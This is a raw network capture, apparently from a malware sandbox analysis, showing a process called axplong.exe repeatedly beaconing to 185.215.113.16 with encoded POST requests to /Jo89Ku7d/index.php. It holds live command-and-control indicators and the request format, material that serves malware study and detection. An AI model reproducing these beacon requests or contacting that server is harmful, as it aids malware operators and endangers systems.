Jul 26, 2024 20:58:08.535871029 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:09.395504951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:09.396681070 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:09.648875952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:09.769277096 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:10.526463032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:10.527566910 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:10.773087025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:10.906624079 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:11.653270006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:11.654226065 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:11.906245947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49718	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:12.021851063 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:12.797203064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:12.798908949 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:13.056782961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49719	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:13.175335884 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:13.936624050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:13.940500021 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:14.189428091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49720	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:14.299314976 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:15.041475058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:15.042422056 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:15.289223909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49721	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:15.410448074 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:16.185359955 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:16.192528009 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:16.442387104 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49722	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:16.565855026 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:17.307715893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:17.309178114 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:17.553746939 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49723	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:17.677376032 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:18.517805099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:18.518637896 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:18.772489071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49724	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:18.893556118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:19.644718885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:19.645601988 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:19.896271944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49725	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:20.021992922 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:20.789779902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:20.790970087 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:21.045649052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49726	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:21.159559011 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:21.907143116 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:21.907841921 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:22.156018972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49727	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:22.279495001 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:23.036001921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
